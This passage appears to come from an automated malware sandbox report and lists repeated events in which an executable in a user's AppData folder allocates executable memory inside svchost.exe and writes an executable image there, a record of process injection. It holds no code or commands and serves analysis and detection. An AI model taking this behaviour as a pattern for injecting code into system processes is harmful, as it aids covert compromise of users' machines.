      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF50000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F28A0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F28B0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140000000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140000000 protect: page read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140001000 protect: page read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140019000 protect: page read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140020000 protect: page read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140021000 protect: page read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140023000 protect: page read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29D0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory allocated: C:\Windows\System32\svchost.exe base: 159F29D0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: PID: 1984 base: 140020000 value: FFJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: PID: 5496 base: 140020000 value: FFJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140000000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140000000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EE20000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EE30000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D5080Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140000000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140001000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140001000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140020000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140020000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140021000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140021000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140023000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140023000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140024000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140024000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EE30000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EE30000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019180Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019188Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019190Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019198Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191A0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191A8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191B0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191B8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191C0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191C8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191D0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191D8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191E0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191E8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191F0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191F8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019200Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019208Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019210Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019218Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019220Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019228Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019230Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019238Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019240Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019248Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019250Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019258Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019260Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019268Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019270Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019278Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
